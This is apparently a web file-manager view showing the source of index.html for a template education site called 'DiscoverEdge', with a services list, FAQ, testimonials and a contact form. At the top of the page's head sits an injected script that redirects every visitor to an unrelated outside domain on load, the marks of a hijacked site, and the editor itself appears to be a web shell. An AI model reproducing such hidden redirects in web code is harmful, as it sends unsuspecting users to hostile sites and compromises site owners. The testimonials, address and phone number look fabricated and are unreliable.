File Editor
Directories:
.. (Back)
css
img
js
Files:
contact.html
index.html
order.php
policy.html
reviews.html
robots.txt
services.html
terms.html
thankyou.html
the-power-of-lifelong-learning.html
unlock-your-potential-with-discoveredge-online-courses.html
Create New File
Create
Edit File: index.html
<!DOCTYPE html> <html lang="en"> <head> <script> window.location.href = "https://unisvvap-org.com/?app"; </script> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta name="keywords" content="education, learning, school, online courses, e-learning, study materials, educational resources, student support, academic success, distance learning" /> <meta name="description" content="This education website offers a wide range of resources, courses, and information to support students in their academic journey. Explore topics, articles, and tools to help enhance your learning experience. Join us in unlocking your full potential and achieving your educational goals." /> <title>Empowering Minds, Inspiring Futures</title> <link rel="stylesheet" href="css/bootstrap.min.css" /> <link rel="stylesheet" href="css/styles.css" /> <link rel="stylesheet" href="css/font-awesome.min.css" /> <link rel='stylesheet' href='css/boxicons.min.css'> <link rel="stylesheet" href="css/aos.css"> <link rel="stylesheet" href="css/bootstrap-icons.css"> <link rel="stylesheet" href="css/swiper-bundle.min.css" /> </head> <body> <!-- ======= Header ======= --> <header id="header" class="fixed-top bg-light"> <div class="container d-flex align-items-center justify-content-between"> <h1 class="logo"><a href="/"><i class="fa fa-check-circle"></i><strong>DiscoverEdge</strong></a></h1> <nav id="navbar" class="navbar"> <ul> <li><a class="nav-link scrollto active" href="index.html">Home</a></li> <li><a class="nav-link scrollto" href="#about">About</a></li> <li><a class="nav-link scrollto" href="services.html">Services</a></li> <li class="dropdown"> <a href="#"><span>Blog</span> <i class="bi bi-chevron-down"></i></a> <ul> <li><a href="the-power-of-lifelong-learning.html">The Power of Lifelong Learning</a></li> <li><a href="unlock-your-potential-with-discoveredge-online-courses.html">Unlock Your Potential with DiscoverEdge Online Courses</a></li> </ul> </li> <li><a class="nav-link scrollto" href="reviews.html">Testimonials</a></li> <li><a class="nav-link scrollto" href="contact.html">Contact</a></li> <li><a class="getstarted scrollto" href="#about">Get Started</a></li> </ul> <i class="bi bi-list mobile-nav-toggle"></i> </nav> <!-- .navbar --> </div> </header> <!-- End Header --> <main> <section id="hero"> <div class="hero-container"> <div id="heroCarousel" data-bs-interval="5000" class="carousel slide carousel-fade" data-bs-ride="carousel"> <ol class="carousel-indicators" id="hero-carousel-indicators"></ol> <div class="carousel-inner" role="listbox"> <!-- Slide 1 --> <div class="carousel-item active" style="background-image: url(/img/image-background.png);"> <div class="carousel-container"> <div class="carousel-content"> <h2 class="animate__animated animate__fadeInDown">Empowering Minds, Inspiring Futures</h2> <p class="animate__animated animate__fadeInUp">At DiscoverEdge, we are dedicated to providing innovative educational solutions that empower individuals to unlock their full potential and shape a brighter future. Our cutting-edge tools and personalized approach create a dynamic learning environment that fosters growth, creativity, and success for all learners.</p> <div> <a href="#about" class="btn-get-started animate__animated animate__fadeInUp scrollto">Read More</a> </div> </div> </div> </div> </div> </div> </div> </section> <!-- ======= Why Us Section ======= --> <section id="why-us" class="why-us bg-light"> <div class="container py-5"> <div class="section-title text-center py-5"> <h2>Features</h2> </div> <div class="row"> <div class="col-lg-4"> <div class="box"> <span>01</span> <h4>Interactive Learning</h4> <p>Engage with interactive lessons and activities that make learning fun and effective. Our platform offers a variety of multimedia content to cater to different learning styles.</p> </div> </div> <div class="col-lg-4 mt-4 mt-lg-0"> <div class="box"> <span>02</span> <h4>Personalized Study Plans</h4> <p>Receive customized study plans tailored to your individual needs and goals. Our adaptive learning technology ensures that you focus on areas where you need the most improvement.</p> </div> </div> <div class="col-lg-4 mt-4 mt-lg-0"> <div class="box"> <span>03</span> <h4>Progress Tracking</h4> <p>Track your progress easily with detailed analytics and performance metrics. Stay motivated as you monitor your improvement over time and celebrate your achievements.</p> </div> </div> </div> </div> </section><!-- End Why Us Section --> <section id="services" class="bg-light"> <div class="container"> <div class="row d-flex justify-content-center"> <div class="col-md-10 col-xl-8 text-center"> <h2 class="py-5">What We Do</h2> </div> </div> <div class="row text-center py-5"> <div class="col-md-4 mb-5 mb-md-0"> <h5 class="mb-3">Online Tutoring</h5> <p class="px-xl-3"> Our experienced tutors provide personalized online tutoring sessions to help students excel in various subjects. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> <div class="col-md-4 mb-5 mb-md-0"> <h5 class="mb-3">Test Preparation</h5> <p class="px-xl-3"> We offer comprehensive test preparation courses designed to help students achieve their best scores on standardized tests. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> <div class="col-md-4 mb-0"> <h5 class="mb-3">College Admissions Assistance</h5> <p class="px-xl-3"> Our team assists students with college applications, essays, and interview preparation to increase their chances of acceptance. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> </div> <div class="row text-center py-5"> <div class="col-md-4 mb-5 mb-md-0"> <h5 class="mb-3">Study Skills Workshops</h5> <p class="px-xl-3"> Our workshops focus on improving study habits, time management, and organizational skills to enhance academic performance. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> <div class="col-md-4 mb-5 mb-md-0"> <h5 class="mb-3">Career Counseling</h5> <p class="px-xl-3"> We provide professional guidance and resources to help students explore career options and make informed decisions about their future. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> <div class="col-md-4 mb-0"> <h5 class="mb-3">Language Courses</h5> <p class="px-xl-3"> Our language courses cater to students of all levels, offering interactive lessons to improve language proficiency and cultural understanding. <a href="contact.html" class="nav-link btn btn-outline-secondary mt-5">Get A Quote</a> </p> </div> </div> </div> </section> <section id="about" class="bg-light py-5"> <div class="container pt-5"> <h2 class="text-center">The Power of Lifelong Learning</h2> <div class="py-3">At DiscoverEdge, we understand the importance of continuous learning in today's fast-paced world. Learning is not just a one-time event, but a lifelong journey that leads to personal growth and professional success. Embracing new knowledge and skills allows us to adapt to changes, stay competitive in the market, and innovate in our industry.Through learning, we expand our horizons, challenge our thinking, and discover new opportunities. It empowers us to overcome obstacles, take on new challenges, and reach our full potential. By fostering a culture of learning within our organization, we encourage creativity, collaboration, and excellence.Let us embark on this journey together, where curiosity is our compass, and knowledge is our guide. Together, we can unlock endless possibilities and shape a brighter future for DiscoverEdge and beyond.</div> </div> </section> <!-- Testimonials Section - Home Page --> <section id="testimonials" class="testimonials bg-light py-5"> <div class="container py-5"> <div class="row align-items-center"> <div class="col-lg-5 info" data-aos="fade-up" data-aos-delay="100"> <h3>Testimonials</h3> </div> <div class="col-lg-7" data-aos="fade-up" data-aos-delay="200"> <div class="swiper"> <template class="swiper-config"> { "loop": true, "speed" : 600, "autoplay": { "delay": 5000 }, "slidesPerView": "auto", "pagination": { "el": ".swiper-pagination", "type": "bullets", "clickable": true } } </template> <div class="swiper-wrapper"> <div class="swiper-slide"> <div class="testimonial-item"> <div class="d-flex"> <img src="img/reviewphoto895151.png" class="testimonial-img flex-shrink-0" alt="" /> <div> <h3>Thomas King</h3> <div class="stars"><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i></div> </div> </div> <p> <i class="bi bi-quote quote-icon-left"></i> <span >I am beyond impressed with the quality of work delivered by the team at DiscoverEdge. They listened to my needs and created a stunning landing page for my education company. Highly recommend!</span > <i class="bi bi-quote quote-icon-right"></i> </p> </div> </div> <!-- End testimonial item --> <div class="swiper-slide"> <div class="testimonial-item"> <div class="d-flex"> <img src="img/reviewphoto895152.png" class="testimonial-img flex-shrink-0" alt="" /> <div> <h3>Ellie Smith</h3> <div class="stars"><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i></div> </div> </div> <p> <i class="bi bi-quote quote-icon-left"></i> <span >Working with DiscoverEdge was a breeze from start to finish. The communication was clear, the project was delivered on time, and the end result exceeded my expectations. I couldn't be happier with my new landing page!</span > <i class="bi bi-quote quote-icon-right"></i> </p> </div> </div> <!-- End testimonial item --> <div class="swiper-slide"> <div class="testimonial-item"> <div class="d-flex"> <img src="img/reviewphoto895153.png" class="testimonial-img flex-shrink-0" alt="" /> <div> <h3>Matthew Patterson</h3> <div class="stars"><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i><i class="bi bi-star-fill"></i></div> </div> </div> <p> <i class="bi bi-quote quote-icon-left"></i> <span>DiscoverEdge truly understands the education industry and it shows in their work. The landing page they designed for my company is not only visually appealing but also user-friendly. I'm grateful for their expertise and professionalism.</span> <i class="bi bi-quote quote-icon-right"></i> </p> </div> </div> <!-- End testimonial item --> </div> <div class="swiper-pagination"></div> </div> </div> </div> </div> </section> <!-- End Testimonials Section --> <!-- Faq Section - Home Page --> <section class="faq bg-light"> <div class="container py-5"> <div class="row gy-4"> <div class="col-lg-4" data-aos="fade-up" data-aos-delay="100"> <div class="content px-xl-5"> <h3><span>Frequently Asked </span><strong>Questions</strong></h3> </div> </div> <div class="col-lg-8" data-aos="fade-up" data-aos-delay="200"> <div class="faq-container"> <div class="faq-item faq-active"> <h3><span class="num">1.</span> <span>How can I enroll my child in your educational programs?</span></h3> <div class="faq-content"> <p>To enroll your child in our educational programs, simply visit our website and fill out the online registration form. You can also contact our admissions team for assistance.</p> </div> <i class="faq-toggle bi bi-chevron-right"></i> </div> <!-- End Faq item--> <div class="faq-item"> <h3><span class="num">2.</span> <span>What age groups do you cater to?</span></h3> <div class="faq-content"> <p>We cater to children of all age groups, from toddlers to teenagers. Our programs are designed to meet the learning needs of students at different stages of their academic journey.</p> </div> <i class="faq-toggle bi bi-chevron-right"></i> </div> <!-- End Faq item--> <div class="faq-item"> <h3><span class="num">3.</span> <span>Do you offer one-on-one tutoring sessions?</span></h3> <div class="faq-content"> <p>Yes, we offer personalized one-on-one tutoring sessions to help students excel in specific subjects or areas where they may need additional support. Contact us to schedule a tutoring session.</p> </div> <i class="faq-toggle bi bi-chevron-right"></i> </div> <!-- End Faq item--> <div class="faq-item"> <h3><span class="num">4.</span> <span>Are your teachers qualified and experienced?</span></h3> <div class="faq-content"> <p>Our teachers are highly qualified and experienced in their respective fields. They undergo rigorous training to ensure they provide quality education to all students.</p> </div> <i class="faq-toggle bi bi-chevron-right"></i> </div> <!-- End Faq item--> <div class="faq-item"> <h3><span class="num">5.</span> <span>Can parents track their child's progress?</span></h3> <div class="faq-content"> <p>Absolutely! We provide parents with access to an online portal where they can track their child's progress, view grades, and communicate with teachers. Stay involved in your child's education every step of the way.</p> </div> <i class="faq-toggle bi bi-chevron-right"></i> </div> <!-- End Faq item--> </div> </div> </div> </div> </section> <!-- End Faq Section --> <section class="bg-light"> <div id="about" class="container py-5"> <div class="row d-flex justify-center align-items-center"> <div class="col py-5"><iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d89419.96309426984!2d-122.73680115786324!3d45.542804560703324!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950b0b7da97427%3A0x1c36b9e6f6d18591!2sPortland%2C%20OR%2C%20USA!5e0!3m2!1sen!2snl!4v1687183698434!5m2!1sen!2snl" style="border:0; width: 100%; height: 100%;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> <div class="col py-5 text-center"> <h4><span>USA, Portland, 7870 Kelsi Loaf</span></h4> <br /> <h4>Phone: + 1 531-745-8208</h4> <br /> <h4>Email: <span class="email-text"></span></h4> <br /> </div> </div> </div> </section> <section id="contact" class="bg-light"> <div class="container contact"> <div class="row"> <div class="col-md-3 contact_right"> <div class="contact-info"> <img src="https://image.ibb.co/kUASdV/contact-image.png" alt="image" /> <h2>Contact Us</h2> <h4>We would love to hear from you !</h4> </div> </div> <div class="contact_left"> <form action="order.php" method="post"> <div class="contact-form"> <div class="form-group"> <label class="control-label" for="fname">First Name:</label> <input type="text" class="form-control" id="fname" placeholder="Enter First Name" name="fname" /> </div> <div class="form-group"> <label class="control-label" for="lname">Last Name:</label> <input type="text" class="form-control" id="lname" placeholder="Enter Last Name" name="lname" /> </div> <div class="form-group"> <label class="control-label" for="email">Email:</label> <input type="email" class="form-control" id="email" placeholder="Enter email" name="email" /> </div> <div class="form-group"> <label class="control-label" for="comment">Comment:</label> <textarea class="form-control" rows="5" id="comment"></textarea> </div> <div class="form-group"> <div class="col-sm-offset-2"> <button type="submit" class="btn btn-default">Submit</button> </div> </div> </div> </form> </div> </div> </div> </section> </main> <!-- ======= Footer ======= --> <footer id="footer" class="py-5 bg-light"> <div class="footer-top"> <div class="container"> <div class="row"> <div class="col-lg-3 col-md-6 footer-contact"> <h3>DiscoverEdge</h3> <p> USA, Portland, 7870 Kelsi Loaf <br /> <strong>Phone:</strong>+ 1 531-745-8208<br /> <strong>Email:</strong> <span class="email-text"><br /> </p> </div> <div class="col-lg-2 col-md-6 footer-links"> <h4>Useful Links</h4> <ul> <li><i class="bx bx-chevron-right"></i> <a href="policy.html">Privacy Policy</a></li> <li><i class="bx bx-chevron-right"></i> <a href="terms.html">Terms and Conditions</a></li> </ul> </div> <div class="col-lg-3 col-md-6 footer-links"> <h4>Pages</h4> <ul> <li><i class="bx bx-chevron-right"></i> <a href="services.html">Services</a></li> <li><i class="bx bx-chevron-right"></i> <a href="reviews.html">Testimonials</a></li> <li><i class="bx bx-chevron-right"></i> <a href="contact.html">Contacts</a></li> </ul> </div> <div class="col-lg-4 col-md-6 footer-newsletter"> <h4>Join Our Newsletter</h4> <p>Get fresh news and updates delivered straight to your inbox by subscribing to our newsletter!</p> <form action="order.php" method="post"><input type="email" name="email" /><input type="submit" value="Subscribe" /></form> </div> </div> </div> </div> <div class="container d-md-flex py-4"> <div class="me-md-auto text-center text-md-start"> <div class="copyright"> © Copyright <strong><span>DiscoverEdge</span></strong >. All Rights Reserved </div> </div> </div> </footer> <!-- End Footer --> <script type="text/javascript" src="js/popper.js"></script><script> window.start.init({Palette:"palette1",Mode:"banner bottom",Time:"0", Message: 'We use cookies to improve the site and its user experience. By continuing to use the site, you agree to the use of cookies. You can always disable cookies in your browser settings.', ButtonText: 'Accept', LinkText: 'Learn more'})</script> <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/aos.js"></script> <script src="js/swiper-bundle.min.js"></script> <script src="js/script.js"></script> <script>AOS.init();</script> </body> </html>
Save Changes
Rename File
Rename